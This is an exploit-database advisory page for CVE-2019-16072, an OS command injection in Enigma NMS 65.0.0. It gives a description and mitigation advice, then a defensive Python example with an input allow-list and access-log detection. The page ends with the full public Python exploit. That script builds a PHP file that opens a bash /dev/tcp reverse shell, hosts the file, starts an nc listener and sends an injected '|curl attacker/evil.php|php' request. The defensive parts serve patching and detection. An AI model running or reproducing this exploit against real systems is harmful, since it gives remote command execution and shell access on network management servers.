Vendor: Enigma NMS
By: Mark Cross
CVSS: 9.8 (CRITICAL)
CWE: 78 (OS Command Injection)
Product Name: Enigma NMS
Affected Version From: Enigma NMS 65.0.0
Affected Version To: Enigma NMS 65.0.0
Patch Exists: YES
CVE: CVE-2019-16072
CPE: a:netsas:enigma_nms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
Year: 2019

Enigma NMS OS Command Injection

NETSAS Pty Ltd Enigma NMS 65.0.0 is vulnerable to OS command injection (CWE-78, CVE-2019-16072). The 'ip_address' parameter of the 'discover_and_manage.cgi' script (action=snmp_browser) is handed to a shell without filtering shell metacharacters, so a value such as |curl <attacker>/evil.php|php terminates the command the CGI intended to run and appends an attacker-controlled pipeline. The script lives under /cgi-bin/protected/ and the public exploit authenticates with HTTP Basic credentials, so an attacker needs a valid Enigma NMS login; with one, a single crafted GET request executes arbitrary commands with the privileges of the web server process running the CGI. The exploit below hosts a PHP reverse shell on the attacker's machine and makes the target fetch it with curl and pipe it into php.

Mitigation:

Upgrade to a release that fixes CVE-2019-16072 (the vendor has published a patch). In the application itself, treat ip_address as an IP literal: parse it and reject anything that is not a valid IPv4/IPv6 address, and invoke whatever command the CGI runs with an argument vector rather than a shell command string so that metacharacters are never interpreted. Until patched, restrict access to /cgi-bin/protected/ to trusted management networks and review web-server access logs for requests to discover_and_manage.cgi whose ip_address value contains characters such as '|', ';' or their percent-encoded forms.
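The following is an added illustration, not NETSAS code: the source of discover_and_manage.cgi is not on this page, so vulnerable_command() reconstructs the bug class the advisory describes (query fields concatenated into a shell command) rather than the actual script. The snmpwalk command line, the Apache-style access-log lines and the 198.51.100.7 / 192.0.2.10 addresses are assumptions constructed for the example. It shows the weak pattern beside a hardened parser that validates ip_address as an address literal and builds an argv list, and a log check that flags the exploit's telltale.

```python
"""Vulnerable vs. hardened handling of the 'ip_address' CGI parameter,
plus an access-log check for the exploit's telltale.

Added illustration, not NETSAS code. vulnerable_command() is a
reconstruction of the bug class, not discover_and_manage.cgi itself;
the snmpwalk command line and the log lines are assumptions.
"""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Constructed queries. INJECTED_QUERY mirrors the one the PoC sends.
INJECTED_QUERY = (
    "action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address="
    "|curl%20198.51.100.7:8000/evil.php|php&snmp_ro_string=public"
    "&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
)
BENIGN_QUERY = (
    "action=snmp_browser&ip_address=192.0.2.10&snmp_ro_string=public"
    "&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
)


def fields(query):
    """First value of each query parameter, percent-decoded ('' if blank)."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def vulnerable_command(query):
    """Reconstructed bug class: fields pasted into one string that is handed
    to /bin/sh -c. A '|' in ip_address ends the intended command and starts
    the attacker's pipeline (curl ... | php in the PoC)."""
    p = fields(query)
    return "snmpwalk -v%s -c %s %s %s" % (
        p["snmp_version"], p["snmp_ro_string"], p["ip_address"], p["mib_oid_manual"])


OID_RE = re.compile(r"^\.?\d+(\.\d+)*$")
COMMUNITY_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def hardened_argv(query):
    """Allow-list every field, then build an argv list. The list is run
    without a shell (see run_hardened), so even a value that slipped past
    validation is never re-parsed for metacharacters."""
    p = fields(query)
    try:
        host = str(ipaddress.ip_address(p.get("ip_address", "")))
    except ValueError:
        raise ValueError("ip_address must be a literal IPv4/IPv6 address")
    if p.get("snmp_version") not in ("1", "2c"):
        raise ValueError("unsupported snmp_version")
    community = p.get("snmp_ro_string", "")
    if not COMMUNITY_RE.match(community):
        raise ValueError("snmp_ro_string contains disallowed characters")
    oid = p.get("mib_oid_manual", "")
    if not OID_RE.match(oid):
        raise ValueError("mib_oid_manual must be a dotted numeric OID")
    return ["snmpwalk", "-v" + p["snmp_version"], "-c", community, host, oid]


def rejects(query):
    """True if the hardened parser refuses the request."""
    try:
        hardened_argv(query)
    except ValueError:
        return True
    return False


def run_hardened(query):
    """Execute with an argv list and the default shell=False. Needs snmpwalk
    on PATH, so the checks at the end do not call it."""
    return subprocess.run(hardened_argv(query), capture_output=True, text=True, timeout=30)


# Constructed Apache-style access-log lines (not from the page).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
SHELL_META = re.compile(r"[|;&`$<>(){}\n]")
ACCESS_LOG = [
    '10.0.0.5 - admin [21/Jul/2019:10:00:00 +1000] "GET /cgi-bin/protected/'
    'discover_and_manage.cgi?%s HTTP/1.1" 200 5120' % BENIGN_QUERY,
    '10.0.0.9 - admin [21/Jul/2019:10:00:05 +1000] "GET /cgi-bin/protected/'
    'discover_and_manage.cgi?%s HTTP/1.1" 200 0' % INJECTED_QUERY,
]


def suspicious_request(log_line):
    """Flag a discover_and_manage.cgi request whose decoded ip_address holds
    shell metacharacters. Decoding first also catches %7C for '|'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not url.path.endswith("/discover_and_manage.cgi"):
        return False
    return bool(SHELL_META.search(fields(url.query).get("ip_address", "")))


if __name__ == "__main__":
    print("vulnerable command:", vulnerable_command(INJECTED_QUERY))
    print("hardened argv:", hardened_argv(BENIGN_QUERY))
    print("injected request rejected:", rejects(INJECTED_QUERY))
    print("log hits:", [suspicious_request(line) for line in ACCESS_LOG])
```

The two defences are independent on purpose: the allow-list blocks the request at the door, and the argv form means a future bypass of the allow-list still cannot reach a shell. The log check decodes the query before matching so that a percent-encoded pipe does not slip past a raw string search.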

Exploit-DB raw data:

#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection                     #
# NETSAS Pty Ltd Enigma NMS                                          #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16072                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#

# Python 2 script: raw_input, print statements and the SimpleHTTPServer module.
import os, signal, subprocess, getpass, requests

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
# The CGI sits under /cgi-bin/protected/, so valid Enigma NMS credentials are required.
user = raw_input("Enter Username:\t\t\t")
password = getpass.getpass("Enter Password (no echo):\t")

# Injection point is ip_address: the leading '|' ends the command the CGI builds
# and pipes our hosted evil.php into php on the target.
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

# PHP stub that spawns a bash reverse shell back to us
print "\n\n[+] Building PHP reverse shell"
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file (own process group so it can be killed cleanly)
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener; it shares our terminal, so the shell session is interactive
print "[+] Creating listener on port " + rev_sh_port
listener = subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS. The CGI does not return until the spawned shell
# exits, so this call blocks for as long as the reverse shell session is open.
print "[+] Sending payload\n"
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
    print "\n[+] Request completed with HTTP %d (401 means the credentials were rejected)" % r.status_code
except requests.exceptions.RequestException as e:
    print "\n[-] Request failed: %s" % e

print "\n[+] Cleaning up mess..." 

# Shut down http server, listener and the hosted payload
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
listener.terminate()
if os.path.exists("evil.php"):
    os.remove("evil.php")